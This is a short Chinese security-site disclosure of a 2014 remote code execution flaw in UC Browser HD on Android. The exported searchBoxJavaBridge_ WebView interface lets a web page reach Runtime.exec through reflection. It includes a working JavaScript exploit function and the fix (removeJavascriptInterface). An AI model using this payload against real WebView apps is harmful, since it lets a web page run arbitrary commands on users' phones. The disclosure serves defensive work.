频道栏目
首页 > 安全 > 网站安全 > 正文
UC浏览器HD版本远程代码执行漏洞
2014-04-28 12:59:08           
收藏   我要投稿
浏览器来说这种问题还是需要修补的

 

导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在

 

function execute(cmdArgs)

{

return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

 

 

 

 

测试页面:https://drops.wooyun.org/webview.html

 

参见: /Article/201309/241271.html
 

漏洞证明:

1.jpg

修复方案:

需要把这个接口删除,调用removeJavascriptInterface方法
/Article/201404/296370.html

点击复制链接 与好友分享!回本站首页
上一篇:Android WebView的Js对象注入漏洞解决方案
下一篇:destoon新版短消息中心xss指谁打谁
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站